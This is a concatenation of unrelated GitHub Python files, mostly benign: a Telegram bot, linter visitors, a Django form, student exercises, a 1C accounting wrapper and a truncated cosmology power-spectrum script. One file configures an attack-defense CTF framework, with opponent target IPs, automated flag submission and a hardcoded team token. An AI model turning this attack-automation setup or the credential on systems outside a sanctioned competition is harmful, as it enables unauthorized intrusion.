pass_args=True)\nFED_IMPORTBAN_HANDLER = CommandHandler(\"importfbans\", fed_import_bans, pass_chat_data=True)\n\nDELETEBTN_FED_HANDLER = CallbackQueryHandler(del_fed_button, 
pattern=r\"rmfed_\")\n\ndispatcher.add_handler(NEW_FED_HANDLER)\ndispatcher.add_handler(DEL_FED_HANDLER)\ndispatcher.add_handler(JOIN_FED_HANDLER)\ndispatcher.add_handler(LEAVE_FED_HANDLER)\ndispatcher.add_handler(PROMOTE_FED_HANDLER)\ndispatcher.add_handler(DEMOTE_FED_HANDLER)\ndispatcher.add_handler(INFO_FED_HANDLER)\ndispatcher.add_handler(BAN_FED_HANDLER)\ndispatcher.add_handler(UN_BAN_FED_HANDLER)\ndispatcher.add_handler(FED_BROADCAST_HANDLER)\ndispatcher.add_handler(FED_SET_RULES_HANDLER)\ndispatcher.add_handler(FED_GET_RULES_HANDLER)\ndispatcher.add_handler(FED_CHAT_HANDLER)\ndispatcher.add_handler(FED_ADMIN_HANDLER)\ndispatcher.add_handler(FED_USERBAN_HANDLER)\n# dispatcher.add_handler(FED_NOTIF_HANDLER)\ndispatcher.add_handler(FED_CHATLIST_HANDLER)\ndispatcher.add_handler(FED_IMPORTBAN_HANDLER)\n\ndispatcher.add_handler(DELETEBTN_FED_HANDLER)\n","repo_name":"xditya/GroupManager","sub_path":"haruka/modules/feds.py","file_name":"feds.py","file_ext":"py","file_size_in_byte":43331,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"42"} +{"seq_id":"71639298687","text":"import ast\nfrom collections import defaultdict\nfrom typing import DefaultDict, List, Union\n\nfrom typing_extensions import final\n\nfrom wemake_python_styleguide import constants\nfrom wemake_python_styleguide.logic.nodes import get_parent\nfrom wemake_python_styleguide.logic.tree.functions import is_method\nfrom wemake_python_styleguide.types import (\n AnyFunctionDef,\n AnyImport,\n ConfigurationOptions,\n)\nfrom wemake_python_styleguide.violations import complexity\nfrom wemake_python_styleguide.violations.base import ErrorCallback\nfrom wemake_python_styleguide.visitors.base import BaseNodeVisitor\nfrom wemake_python_styleguide.visitors.decorators import alias\n\n_ConditionNodes = Union[ast.If, ast.While, ast.IfExp]\n_ModuleMembers = Union[AnyFunctionDef, ast.ClassDef]\n\n\n@final\n@alias('visit_module_members', (\n 'visit_ClassDef',\n 'visit_AsyncFunctionDef',\n 'visit_FunctionDef',\n))\nclass ModuleMembersVisitor(BaseNodeVisitor):\n \"\"\"Counts classes and functions in a module.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Creates a counter for tracked metrics.\"\"\"\n super().__init__(*args, **kwargs)\n self._public_items_count = 0\n\n def visit_module_members(self, node: _ModuleMembers) -> None:\n \"\"\"\n Counts the number of _ModuleMembers in a single module.\n\n Raises:\n TooManyModuleMembersViolation\n\n \"\"\"\n self._check_decorators_count(node)\n self._check_members_count(node)\n self.generic_visit(node)\n\n def _check_members_count(self, node: _ModuleMembers) -> None:\n \"\"\"This method increases the number of module members.\"\"\"\n is_real_method = is_method(getattr(node, 'function_type', None))\n\n if isinstance(get_parent(node), ast.Module) and not is_real_method:\n self._public_items_count += 1\n\n def _check_decorators_count(self, node: _ModuleMembers) -> None:\n number_of_decorators = len(node.decorator_list)\n if number_of_decorators > self.options.max_decorators:\n self.add_violation(\n complexity.TooManyDecoratorsViolation(\n node,\n text=str(number_of_decorators),\n baseline=self.options.max_decorators,\n ),\n )\n\n def _post_visit(self) -> None:\n if self._public_items_count > self.options.max_module_members:\n self.add_violation(\n complexity.TooManyModuleMembersViolation(\n text=str(self._public_items_count),\n baseline=self.options.max_module_members,\n ),\n )\n\n\n@final\nclass _ImportFromMembersValidator(object):\n 
\"\"\"Validator of ``ast.ImportFrom`` nodes names.\"\"\"\n\n def __init__(\n self,\n error_callback: ErrorCallback,\n options: ConfigurationOptions,\n ) -> None:\n self._error_callback = error_callback\n self._options = options\n\n def validate(self, node: ast.ImportFrom) -> None:\n self._check_import_from_names_count(node)\n\n def _check_import_from_names_count(self, node: ast.ImportFrom) -> None:\n imported_names_number = len(node.names)\n if imported_names_number > self._options.max_import_from_members:\n self._error_callback(\n complexity.TooManyImportedModuleMembersViolation(\n node,\n text=str(imported_names_number),\n baseline=self._options.max_import_from_members,\n ),\n )\n\n\n@final\nclass ImportMembersVisitor(BaseNodeVisitor):\n \"\"\"Counts imports in a module.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Creates a counter for tracked metrics.\"\"\"\n super().__init__(*args, **kwargs)\n self._imports_count = 0\n self._imported_names_count = 0\n self._import_from_members_validator = _ImportFromMembersValidator(\n self.add_violation,\n self.options,\n )\n\n def visit_Import(self, node: ast.Import) -> None:\n \"\"\"\n Counts the number of ``import``.\n\n Raises:\n TooManyImportedNamesViolation\n TooManyImportsViolation\n\n \"\"\"\n self._visit_any_import(node)\n\n def visit_ImportFrom(self, node: ast.ImportFrom) -> None:\n \"\"\"\n Counts the number of ``from ... import ...``.\n\n Raises:\n TooManyImported_ModuleMembersViolation\n TooManyImportedNamesViolation\n TooManyImportsViolation\n\n \"\"\"\n self._import_from_members_validator.validate(node)\n self._visit_any_import(node)\n\n def _visit_any_import(self, node: AnyImport) -> None:\n self._imports_count += 1\n self._imported_names_count += len(node.names)\n self.generic_visit(node)\n\n def _check_imports_count(self) -> None:\n if self._imports_count > self.options.max_imports:\n self.add_violation(\n complexity.TooManyImportsViolation(\n text=str(self._imports_count),\n baseline=self.options.max_imports,\n ),\n )\n\n def _check_imported_names_count(self) -> None:\n if self._imported_names_count > self.options.max_imported_names:\n self.add_violation(\n complexity.TooManyImportedNamesViolation(\n text=str(self._imported_names_count),\n baseline=self.options.max_imported_names,\n ),\n )\n\n def _post_visit(self) -> None:\n self._check_imports_count()\n self._check_imported_names_count()\n\n\n@final\nclass ConditionsVisitor(BaseNodeVisitor):\n \"\"\"Checks booleans for condition counts.\"\"\"\n\n def visit_BoolOp(self, node: ast.BoolOp) -> None:\n \"\"\"\n Counts the number of conditions.\n\n Raises:\n TooManyConditionsViolation\n\n \"\"\"\n self._check_conditions(node)\n self.generic_visit(node)\n\n def visit_Compare(self, node: ast.Compare) -> None:\n \"\"\"\n Counts the number of compare parts.\n\n Raises:\n TooLongCompareViolation\n\n \"\"\"\n self._check_compares(node)\n self.generic_visit(node)\n\n def _count_conditions(self, node: ast.BoolOp) -> int:\n counter = 0\n for condition in node.values:\n if isinstance(condition, ast.BoolOp):\n counter += self._count_conditions(condition)\n else:\n counter += 1\n return counter\n\n def _check_conditions(self, node: ast.BoolOp) -> None:\n conditions_count = self._count_conditions(node)\n if conditions_count > constants.MAX_CONDITIONS:\n self.add_violation(\n complexity.TooManyConditionsViolation(\n node,\n text=str(conditions_count),\n baseline=constants.MAX_CONDITIONS,\n ),\n )\n\n def _check_compares(self, node: ast.Compare) -> None:\n is_all_equals = 
all(isinstance(op, ast.Eq) for op in node.ops)\n is_all_notequals = all(isinstance(op, ast.NotEq) for op in node.ops)\n can_be_longer = is_all_notequals or is_all_equals\n\n threshold = constants.MAX_COMPARES\n if can_be_longer:\n threshold += 1\n\n if len(node.ops) > threshold:\n self.add_violation(\n complexity.TooLongCompareViolation(\n node,\n text=str(len(node.ops)),\n baseline=threshold,\n ),\n )\n\n\n@final\nclass ElifVisitor(BaseNodeVisitor):\n \"\"\"Checks the number of ``elif`` cases inside conditions.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Creates internal ``elif`` counter.\"\"\"\n super().__init__(*args, **kwargs)\n self._if_children: DefaultDict[ast.If, List[ast.If]] = defaultdict(\n list,\n )\n\n def visit_If(self, node: ast.If) -> None:\n \"\"\"\n Checks condition not to reimplement switch.\n\n Raises:\n TooManyElifsViolation\n\n \"\"\"\n self._check_elifs(node)\n self.generic_visit(node)\n\n def _get_root_if_node(self, node: ast.If) -> ast.If:\n for root, children in self._if_children.items():\n if node in children:\n return root\n return node\n\n def _update_if_child(self, root: ast.If, node: ast.If) -> None:\n if node is not root:\n self._if_children[root].append(node)\n self._if_children[root].extend(node.orelse) # type: ignore\n\n def _check_elifs(self, node: ast.If) -> None:\n has_elif = all(\n isinstance(if_node, ast.If) for if_node in node.orelse\n )\n\n if has_elif:\n root = self._get_root_if_node(node)\n self._update_if_child(root, node)\n\n def _post_visit(self):\n for root, children in self._if_children.items():\n real_children_length = len(set(children))\n if real_children_length > constants.MAX_ELIFS:\n self.add_violation(\n complexity.TooManyElifsViolation(\n root,\n text=str(real_children_length),\n baseline=constants.MAX_ELIFS,\n ),\n )\n\n\n@final\nclass TryExceptVisitor(BaseNodeVisitor):\n \"\"\"Visits all try/except nodes to ensure that they are not too complex.\"\"\"\n\n def visit_Try(self, node: ast.Try) -> None:\n \"\"\"\n Ensures that try/except is correct.\n\n Raises:\n TooManyExceptCasesViolation\n TooLongTryBodyViolation\n\n \"\"\"\n self._check_except_count(node)\n self._check_try_body_length(node)\n self.generic_visit(node)\n\n def _check_except_count(self, node: ast.Try) -> None:\n if len(node.handlers) > constants.MAX_EXCEPT_CASES:\n self.add_violation(\n complexity.TooManyExceptCasesViolation(\n node,\n text=str(len(node.handlers)),\n baseline=constants.MAX_EXCEPT_CASES,\n ),\n )\n\n def _check_try_body_length(self, node: ast.Try) -> None:\n if len(node.body) > self.options.max_try_body_length:\n self.add_violation(\n complexity.TooLongTryBodyViolation(\n node,\n text=str(len(node.body)),\n baseline=self.options.max_try_body_length,\n ),\n )\n\n\n@final\nclass YieldTupleVisitor(BaseNodeVisitor):\n \"\"\"Finds too long ``tuples`` in ``yield`` expressions.\"\"\"\n\n def visit_Yield(self, node: ast.Yield) -> None:\n \"\"\"\n Helper to get all ``yield`` nodes in a function at once.\n\n Raises:\n TooLongYieldTupleViolation\n\n \"\"\"\n self._check_yield_values(node)\n self.generic_visit(node)\n\n def _check_yield_values(self, node: ast.Yield) -> None:\n if isinstance(node.value, ast.Tuple):\n if len(node.value.elts) > constants.MAX_LEN_YIELD_TUPLE:\n self.add_violation(\n complexity.TooLongYieldTupleViolation(\n node,\n text=str(len(node.value.elts)),\n baseline=constants.MAX_LEN_YIELD_TUPLE,\n ),\n 
)\n","repo_name":"edwarda7/Wemake-Python-Styleguide","sub_path":"wemake_python_styleguide/visitors/ast/complexity/counts.py","file_name":"counts.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"29475977333","text":"from django import forms\nfrom . import models\n\nclass CreateArticle(forms.ModelForm):\n\n #define quais campos de modelos a minha aplicação vai utilizar\n class Meta:\n model = models.Article\n fields = [\n 'title',\n 'body',\n 'slug',\n 'thumb'\n ]\n","repo_name":"lucaslima18/django-blog","sub_path":"django_blog/articles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"30720927814","text":"from time import sleep\n\ndef contador(i, f, p):\n inicio = i\n final = f\n if p < 0:\n p *= -1\n print(f'Contagem de {i} até {f} de {p} em {p}:')\n if f > i:\n while inicio <= f:\n print(f'{inicio}', end=' ')\n inicio += p\n sleep(.5)\n sleep(.5)\n print('FIM!')\n print('-' * 30)\n else:\n while inicio >= f:\n print(f'{inicio}', end=' ')\n inicio -= p\n sleep(.5)\n sleep(.5)\n print('FIM!')\n print('-' * 30)\n\ncontador(1,10,1)\ncontador(10,0,2)\n\nprint('Agora é a sua vez de personalizar a contagem!')\ni = int(input('Inicio: '))\nf = int(input('Final: '))\np = int(input('Passo: '))\ncontador(i,f,p)\n","repo_name":"igorzfrank/Cursos","sub_path":"Curso em Video/python/PytonExercicios/ex098-funcaoContador.py","file_name":"ex098-funcaoContador.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71144382176","text":"#!/usr/bin/python3\n\"\"\"print square\"\"\"\n\n\ndef print_square(size):\n \"\"\"this function that prints a square with #\"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n if type(size) is not float and size < 0:\n raise TypeError(\"size must be an integer\")\n for i in range(size):\n print(\"#\" * size)\n","repo_name":"stevengm45/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30809087180","text":"import datetime\n\nit_test = True\n\n\n# Обертки сервисов\nclass Wrapper1C:\n def __init__(self, name_object, object_to_serial):\n\n value = \"\"\n if name_object == \"ПлатежноеПоручение\":\n name_object_type = Operation.get_name_type_payment(self, object_to_serial)\n if name_object_type == \"in\":\n value_object = PaymentOrderIn(object_to_serial)\n elif name_object_type == \"out\":\n value_object = PaymentOrderOut(object_to_serial)\n else:\n value_object = {\"value\": \"\"}\n value = value_object.value\n else:\n value_object = \"\"\n if value != \"\":\n self.value = {\n \"#type\": value_object.typeObject1C + \".\" + value_object.nameType,\n \"#value\": value\n }\n else:\n self.value = \"\"\n\n\nclass WrapperTinkoff:\n def __init__(self, name_object, object_to_serial):\n if name_object == \"Operation\":\n pass\n self.value = \"\"\n\n\n# Объекты внешних ИС\nclass Operation:\n def __init__(self, operation_type):\n self.operationType = operation_type\n self.kbk = \"kbk_test\"\n self.payerInn = \"payerInn\"\n self.payerKpp 
= \"payerKpp\"\n self.payerName = \"payerName\"\n self.amount = 123\n self.recipient = \"test\",\n self.recipientInn = \"test\",\n self.recipientKpp = \"test\",\n self.payerAccount = \"test\",\n self.payerCorrAccount = \"test\",\n self.payerBank = \"test\",\n self.payerBic = \"test\",\n self.recipientAccount = \"test\",\n self.recipientCorrAccount = \"test\",\n self.recipientBank = \"test\",\n self.recipientBic = \"test\",\n self.id = \"123\",\n self.paymentType = \"test\",\n self.uin = \"test\",\n self.creatorStatus = \"test\",\n self.oktmo = \"test\",\n self.taxEvidence = \"test\",\n self.taxPeriod = \"test\",\n self.taxDocNumber = \"test\",\n self.taxDocDate = \"test\",\n self.taxType = \"test\",\n self.executionOrder = \"test\"\n\n @staticmethod\n def get_name_type_payment(self, operation):\n if operation.operationType == \"\":\n return \"in\"\n else:\n return \"out\"\n\n\n# Объекты платформы 1С\nclass Object1c():\n def __init__(self):\n self.value = {\n \"Ref\": \"00000000-0000-0000-0000-000000000000\",\n \"DeletionMark\": False\n }\n self.nameType = \"te\"\n self.typeObject1C = \"\"\n\n\nclass Document1c(Object1c):\n def __init__(self):\n Object1c.__init__(self)\n self.value.update({\n \"Date\": str(datetime.datetime.now()),\n \"Number\": \"\",\n \"Posted\": False\n })\n self.nameType = \"\"\n self.typeObject1C = \"jcfg:DocumentObject\"\n\n\n# Объекты метаданных 1С\nclass PaymentOrder(Document1c):\n def __init__(self, operation):\n Document1c.__init__(self)\n self.value.update({\n \"ВалютаДокумента\": get_link_object_1c(self, \"currency\",\n {\"КодВалюты\": 643}),\n \"ВидОперации\": operation.operationType,\n \"Контрагент\": get_link_object_1c(self, \"client\",\n {\"ИНН\": operation.payerInn,\n \"КПП\": operation.payerKpp,\n \"Наименование\": operation.payerName}),\n \"Организация\": get_link_object_1c(self, \"company\",\n {\"Наименование\": operation.recipient,\n \"ИНН\": operation.recipientInn,\n \"КПП\": operation.recipientKpp}),\n \"Ответственный\": \"\",\n \"ОтражатьВБухгалтерскомУчете\": True,\n \"ОтражатьВНалоговомУчете\": True,\n \"ОтраженоВОперУчете\": True,\n \"Подразделение\": \"\",\n \"Комментарий\": operation.id,\n \"СуммаДокумента\": operation.amount,\n \"СчетКонтрагента\": get_link_object_1c(self, \"clientAccount\",\n {\"НомерСчета\": operation.payerAccount,\n \"КорСчет\": operation.payerCorrAccount,\n \"БАНК\": operation.payerBank,\n \"БИК\": operation.payerBic}),\n \"СчетОрганизации\": get_link_object_1c(self, \"companyAccount\",\n {\"НомерСчета\": operation.recipientAccount,\n \"КорСчет\": operation.recipientCorrAccount,\n \"БАНК\": operation.recipientBank,\n \"БИК\": operation.recipientBic}),\n })\n\n @staticmethod\n def get_name_type_payment(self, document_1C):\n if document_1C.nameType == \"jcfg:DocumentObject.ПлатежноеПоручениеВходящее\":\n return \"in\"\n else:\n return \"out\"\n\n @staticmethod\n def set_value(self, document_1C, name_value, value):\n document_1C.value.update({name_value: value})\n\n\nclass PaymentOrderIn(PaymentOrder):\n def __init__(self, operation):\n PaymentOrder.__init__(self, operation)\n self.value.update({'ППВ': operation.kbk})\n self.nameType = \"ПлатежноеПоручениеВходящее\"\n\n\nclass PaymentOrderOut(PaymentOrder):\n def __init__(self, operation):\n PaymentOrder.__init__(self, operation)\n\n self.nameType = \"ПлатежноеПоручениеИсходящее\"\n parameters_request = {\"Номер\": operation.recipient,\n \"Дата\": operation.recipientInn}\n link_1c = get_link_object_1c(self, \"PayOut\", parameters_request)\n if link_1c == \"\":\n 
self.value.update({'КодКБК': operation.kbk})\n\n\n# Получение ссылок из 1С\ndef get_link_object_1c(self, object_1c, parameters_request):\n request_1c = \"\"\n\n if it_test:\n body_request = {\"request_1c\": request_1c, \"parameters_request\": parameters_request}\n return body_request\n\n if object_1c == \"client\":\n template = 'SELECT value FROM z_keyvalue WHERE key=:key'\n parameters = {'key': 'CLIENT_REQUEST'}\n request_1c = session.execute(template, parameters).fetchall()\n if object_1c == \"PayOut\":\n template = 'SELECT value FROM z_keyvalue WHERE key=:key'\n parameters = {'key': 'PAYOUT_REQUEST'}\n request_1c = session.execute(template, parameters).fetchall()\n else:\n request_1c = \"\"\n body_request = {\"request_1c\": request_1c, \"parameters_request\": parameters_request}\n\n conn = outgoing.plain_http['mak01.outconn'].conn\n dl_period = 1 # in days\n\n params = body_request\n response = conn.get(self.cid, params=params)\n if response.status_code != 200:\n return \"\"\n else:\n data_base = response.json()\n return data_base.link\n\n\n# Тесты\noperation_test = Operation(\"test_value\")\ntestWrapper = Wrapper1C(\"ПлатежноеПоручение\", operation_test)\nprint(testWrapper.value)\n","repo_name":"GlebNSK/ESB_Intagration","sub_path":"payment_orders.py","file_name":"payment_orders.py","file_ext":"py","file_size_in_byte":7638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28657676200","text":"import json\nimport requests\n\nfrom ataka.common.flag_status import FlagStatus\n\n### EXPORTED CONFIG\n\n# Ataka Host Domain / IP\nATAKA_HOST = \"ataka.h4xx.eu\"\n\n# Default targets for atk runlocal\nRUNLOCAL_TARGETS = [\n # NOP Team\n \"10.60.0.1\",\n \"10.61.0.1\",\n \"10.62.0.1\",\n \"10.63.0.1\",\n \"10.60.1.1\",\n \"10.61.1.1\",\n \"10.62.1.1\",\n \"10.63.1.1\",\n \"10.60.7.1\",\n \"10.61.7.1\",\n \"10.62.7.1\",\n \"10.63.7.1\",\n]\n\n# IPs that are always excluded from attacks. 
These can be included in runlocal with --ignore-exclusions\n# These still get targets with flag ids, they're just never (automatically) attacked\nSTATIC_EXCLUSIONS = {\"10.60.5.1\", \"10.61.5.1\", \"10.62.5.1\", \"10.63.5.1\"}\n\nROUND_TIME = 120\n\n# format: regex, group where group 0 means the whole regex\nFLAG_REGEX = r\"[A-Z0-9]{31}=\", 0\n\n# Maximum list length for submit_flags()\nFLAG_BATCHSIZE = 2500\n\n# Minimum wait in seconds between each call of submit_flags()\nFLAG_RATELIMIT = 5\n\n# When the CTF starts\nSTART_TIME = 1689490800 + 1 # Sun Jul 16 2023 09:00:00 GMT+0200 (Central European Summer Time)\n\n### END EXPORTED CONFIG\n\n\nTEAM_TOKEN = \"45f8890e6c13d864527c1e869ca384d0\"\nSUBMIT_URL = \"http://10.10.0.1:8080/flags\"\nFLAGID_URL = \"http://10.10.0.1:8081/flagIds\"\n\n\ndef get_targets():\n services = [\"CyberUni_1\", \"CyberUni_2\", \"CyberUni_3\", \"CyberUni_4\",\n \"ClosedSea-1\", \"ClosedSea-2\", \"Trademark\", \"rpn\"]\n\n ## TODO: fill\n default_targets = {\n \"rpn\":\n {f\"10.60.{i}.1\": [] for i in range(10)},\n \"CyberUni_1\":\n {f\"10.61.{i}.1\": [] for i in range(10)},\n \"CyberUni_2\":\n {f\"10.61.{i}.1\": [] for i in range(10)},\n \"Trademark\":\n {f\"10.62.{i}.1\": [] for i in range(10)},\n }\n ## A generic solution for just a single vulnbox:\n # default_targets = {service: {f\"10.62.{i}.1\": [] for i in range(10)} for service in services}\n\n flag_ids = requests.get(FLAGID_URL).json()\n\n targets = {\n service: [\n {\n \"ip\": ip,\n \"extra\": json.dumps(ip_info),\n }\n for ip, ip_info in (default_targets[service] | service_info).items()\n ]\n for service, service_info in ({service: [] for service in services} | flag_ids).items()\n }\n\n return targets\n\n\ndef submit_flags(flags):\n resp = requests.put(\n SUBMIT_URL, headers={\"X-Team-Token\": TEAM_TOKEN}, json=flags\n ).json()\n\n results = []\n for flag_resp in resp:\n msg = flag_resp[\"msg\"]\n if flag_resp[\"status\"]:\n status = FlagStatus.OK\n elif \"invalid flag\" in msg:\n status = FlagStatus.INVALID\n elif \"flag from nop team\" in msg:\n status = FlagStatus.INACTIVE\n elif \"flag is your own\" in msg:\n status = FlagStatus.OWNFLAG\n elif \"flag too old\" in msg or \"flag is too old\" in msg:\n status = FlagStatus.INACTIVE\n elif \"flag already claimed\" in msg:\n status = FlagStatus.DUPLICATE\n else:\n status = FlagStatus.ERROR\n print(f\"Got error while flagsubmission: {msg}\")\n results.append(status)\n\n return results\n","repo_name":"OpenAttackDefenseTools/ataka","sub_path":"ataka/ctfconfig/iccdemo.py","file_name":"iccdemo.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"33"} +{"seq_id":"17320297385","text":"import os\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\n# import matplotlib.animation\nimport pandas as pd\nimport argparse\n# import pdb\nfrom munch import Munch\nimport tables\n\nimport camb\nfrom camb import model, initialpower\n\nfrom gadget_tools import Snapshot\nfrom field_tools import compute_power_spec\n# from fitting_fns import halofit\nfrom time import time\n\nt_now = time()\n\nparser = argparse.ArgumentParser(\n description='Density field evolution from Gadget simulation.',\n usage= 'python ./visualize_simulation.py')\n\nparser.add_argument('--simdir', default='/scratch/cprem/sims/', type=str, help='Directory path for all simulations')\n\nparser.add_argument('--simname', type=str, default='bdm_cdm1024', help='Directory name 
containing the saved data')\nparser.add_argument('--cosmo', type=str, default='P18', help='cosmology parameters data from')\nparser.add_argument('--rundirs', type=str, default='r1',\n help='Directory name containing the snapshot binaries')\n\nparser.add_argument('--plots_into', type=str, default='/mnt/home/student/cprem/cosmo-sims/sanity_checks/plots/')\n\nparser.add_argument('--snap_i_list', type=str, default=list(range(50,201,50)), help='Snapshot index number')\n\nparser.add_argument('--light_snaps', type=int, default=1, help='save white bg images for pdf notes')\n\nargs = parser.parse_args()\n\ngrid_size = 1024\nscheme = 'TSC'\n# rundir = 'r1'\ninterlaced = True\n\ninlcd_str = '_interlaced' if interlaced==True else ''\n\nif args.light_snaps:\n theme = '_light'\n plt.style.use('default')\n # plt.set_cmap('nipy_spectral')\nelse:\n theme = ''\n plt.style.use('dark_background')\n # plt.set_cmap('nipy_spectral')\n\n# simname = 'bdm_cdm1024' if args.simname is None else args.simname\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\nschemes = ['NGP', 'CIC', 'TSC']\np = schemes.index(scheme) + 1\n\nrundirs = args.rundirs.split(' ')\n\nrundir = rundirs[0]\nrundir_str = rundir.replace('/', '_') + '-' + rundirs[-1].split('/')[-1] if len(rundirs)>1 else rundir.replace('/', '_')\n\n\nplotsdir = os.path.join(args.plots_into, f'{args.simname:s}', f'matter_pk')\nos.makedirs(plotsdir, exist_ok=True)\n\nsnapdir = os.path.join(args.simdir, args.simname, rundir, 'snaps')\n\ndef snapfilen_prefix(snapdirectory, snap_i):\n if os.path.exists(os.path.join(snapdir, f'snapdir_{0:03d}')):\n return os.path.join(snapdir, 'snapdir_{0:03d}/snapshot_{0:03d}'.format(snap_i))\n else:\n return os.path.join(snapdir, 'snapshot_{0:03d}'.format(snap_i))\n\ndef snapfilen(snapdirectory, snap_i):\n snapfilen_prefix_i = snapfilen_prefix(snapdirectory, snap_i)\n if os.path.exists(snapfilen_prefix_i) or os.path.exists(f'{snapfilen_prefix_i:s}.hdf5'):\n return snapfilen_prefix_i\n else:\n return snapfilen_prefix_i + '.0'\n\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\n# cosmology = 'P18' if args.simname=='bdm_cdm1024' else 'WMAP7'\nif args.cosmo =='P18':\n cos_par_vals = (0.3063375, 0.6936625, 0.0484103, 0.6781, 0.9677, 0.815)\nelif args.cosmo=='WMAP7':\n cos_par_vals = (0.276, 0.724, 0.045, 0.7, 0.961, 0.811)\nelif args.cosmo=='lh1':\n cos_par_vals = (0.3391, 0.6609, 0.05172, 0.6682, 0.9931, 0.8162)\nelif args.cosmo=='lh2':\n cos_par_vals = (0.3503, 0.6497, 0.0505, 0.7522, 0.9703, 0.7802)\nelif args.cosmo=='lh6':\n cos_par_vals = (0.3279, 0.6721, 0.04743, 0.6178, 0.9399, 0.8282)\n\ncos_pars = Munch()\ncos_pars.Om0, cos_pars.Ode0, cos_pars.Ob0, cos_pars.h, cos_pars.ns, cos_pars.sig8 = cos_par_vals\ncos_pars.Ombh2 = (cos_pars.Ob0)*cos_pars.h**2\ncos_pars.Omch2 = (cos_pars.Om0-cos_pars.Ob0)*cos_pars.h**2\n\nprint(args.cosmo, vars(cos_pars))\n\ndef Omega(z, Om0):\n E = Om0 * (1+z)**3 + (1-Om0)\n return Om0 * (1+z)**3 / E\n\ndef D1(z, Om0):\n Om_m = Omega(z, Om0)\n Om_L = 1 - Om_m\n return 5/2* 1/(1+z) * Om_m / (Om_m**(4/7) - Om_L + (1+Om_m/2)*(1+Om_L/70))\n\ndef adjust_lightness(color, amount=0.5):\n # This function from stack for creating lighter or darker versions of matplotlib color\n import matplotlib.colors as mc\n import colorsys\n try:\n c = mc.cnames[color]\n except:\n c = color\n c = colorsys.rgb_to_hls(*mc.to_rgb(c))\n return colorsys.hls_to_rgb(c[0], max(0, min(1, amount * c[1])), c[2])\n\ndef lighter(color): return adjust_lightness(color, 1.5)\n\ndef darker(color): return adjust_lightness(color, 0.7)\n\n\n# 
i_list = list(range(50,201,50))\n# i_list = [0,1]\n\ni_list = [int(x) for x in args.snap_i_list.split(',')]\ni_list.sort()\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\nsnap = Snapshot(snapfilen(snapdir, 0), snapfrmt='gadget4')\n\nbox_size = snap.box_size\nk_nyq = np.pi * grid_size / box_size\nk_start = 2* np.pi / box_size\n\nredshifts=[]\nfor i in i_list:\n snap = Snapshot(snapfilen(snapdir, i), snapfrmt='gadget4')\n redshifts.append(snap.redshift)\n\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\npars_camb = camb.CAMBparams()\npars_camb.set_cosmology(H0=cos_pars.h*100, ombh2=cos_pars.Ombh2, omch2=cos_pars.Omch2)\npars_camb.InitPower.set_params(ns=cos_pars.ns)\n#Note non-linear corrections couples to smaller scales than we want\npars_camb.set_matter_power(redshifts=redshifts, kmax=10*k_nyq)\n\n#Linear spectra\npars_camb.NonLinear = model.NonLinear_none\npars_camb.NonLinearModel.set_params(halofit_version='takahashi')\nresults_camb = camb.get_results(pars_camb)\nkh_camb, z_camb, pk_camb = results_camb.get_matter_power_spectrum(minkh=2e-7, maxkh=100, npoints = 1000)\n# s8 = np.array(results.get_sigma8())\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\n#Non-Linear spectra (Halofit)\npars_camb.NonLinear = model.NonLinear_both\nresults_camb.calc_power_spectra(pars_camb)\nkh_camb_nonlin, z_camb_nonlin, pk_camb_nonlin = results_camb.get_matter_power_spectrum(minkh=k_start*0.8, maxkh=1.2*k_nyq, npoints = 200)\n\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\n\nfig1, ax2 = plt.subplots(1, figsize=(7.5,7), dpi=150)\nplt.rcParams['lines.linewidth'] = 1\n\n# ax2.plot([],[], ' ', label=f\"Scheme-{scheme}, Grid-size: {grid_size:d}\")\nt_bef, t_now = t_now, time()\nprint(t_now - t_bef)\n\nfor index, i in enumerate(i_list[::-1]):\n # t_bef, t_now = t_now, time()\n # print(t_now - t_bef)\n color=next(ax2._get_lines.prop_cycler)['color']\n\n k_full = kh_camb\n pk_lin = pk_camb[index]\n\n\n ax2.plot(k_full, pk_lin, color=color, linestyle=(0, (1, 1)), zorder=3)\n ax2.set_xscale('log')\n ax2.set_yscale('log')\n\n\n ax2.plot(kh_camb_nonlin, pk_camb_nonlin[index], linestyle='solid', color=darker(color), zorder=1)\n\n # pk_fit = halofit.NonLinPowerSpecCDM(Omega(snap.redshift, snap.Omega_m_0))\n # pk_fit.set_Del2L_interpolate(k_full, pk_lin)\n # pk_fit.compute_params(param_from='smith')\n # print(vars(pk_fit))\n # ax2.plot(kh_camb_nonlin, pk_fit.P(kh_camb_nonlin), linestyle='solid', color=darker(color), zorder=2)\n\n lin_bin = np.linspace(np.sqrt(k_start*k_nyq),k_nyq, 50)\n log_bin = np.logspace(np.log10(k_start),np.log10(np.sqrt(k_start*k_nyq)/1.2), 15)\n # merge_bin = np.concatenate([lin_bin,log_bin])\n # merge_bin.sort()power_spec['k'].iloc[1]\n merge_bin = np.union1d(lin_bin, log_bin)\n\n\n # 